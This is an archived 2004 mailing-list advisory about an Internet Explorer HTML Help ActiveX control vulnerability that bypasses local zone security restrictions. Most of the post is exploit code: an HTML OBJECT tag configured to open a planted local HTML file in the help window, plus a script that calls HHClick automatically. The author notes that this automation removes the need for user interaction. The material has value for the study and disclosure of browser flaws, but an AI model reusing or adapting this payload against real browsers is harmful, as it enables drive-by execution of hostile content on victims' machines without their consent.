Security Advisory: Internet Explorer Help ActiveX Control Local Zone Security Restriction Bypass Vulnerability (updated)

[EN] securityvulns.ru
no-pyccku

Related information
  Microsoft Internet Explorer DHTML Edit and Help ActiveX crossite scripting
  Microsoft Security Bulletin MS05-013 Vulnerability in the DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (891781)
  IE HHCTRL exploit still usable even after patch
  US-CERT Technical Cyber Security Alert TA05-012B -- Microsoft Windows HTML Help ActiveX Contol Cross-Domain Vulnerability
  Alert: Microsoft Security Bulletin MS05-001 - Vulnerability in HTML Help Could Allow Code Execution (890175)

From: Paul <paul_(at)_greyhats.cjb.net>
Date: 21.12.2004
Subject: Internet Explorer Help ActiveX Control Local Zone Security Restriction Bypass Vulnerability (updated)

I appologize for the previous vulnerability (longnamevuln) because it was incomplete. After realizing my
mistake, longnamevuln looked useless. However, it was just incomplete, not useless. What longnamevuln did
was open a local file in the browser window. To execute active content, it needed to be opened in the help
window. To do this, a window name parameter set to a blank window needed to be added. The updated code is
designed for Malware's original local zone security restriction bypass which required the user click a
button (http://malware.com/noceegar.html). The drag and drop vulnerability does not appear to be functional;
however, the local zone security bypass vulnerability still appears to work fine. Instead of this (malware's
code):

<OBJECT id="hhctrl" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-
00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,
1194"width=7%
height=7% style="position:absolute;top:140;left:72;z-index:100;">
<PARAM name="Command" value="Index">
<PARAM name="Item1" value="cigar.hhk">
</OBJECT>

one would use this (my code):

<OBJECT id="hhctrl" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-
00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,
1194"width=7%
height=7% style="position:absolute;top:140;left:72;z-index:100;">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;C:\WINDOWS\PCHealth\malwarez[1].htm">
</OBJECT>
<script>
hhctrl.HHClick();
</script>

Notice that HHClick is automated, eliminating the need for user interaction (finally). My site,
http://greyhats.cjb.net, will not be updated with the new code because it is a small change, and I don't
want to go through the hassle of trying to deal with the ftp server on my unreliable host (hope websamba
isnt reading this :).

That's all folks!

test server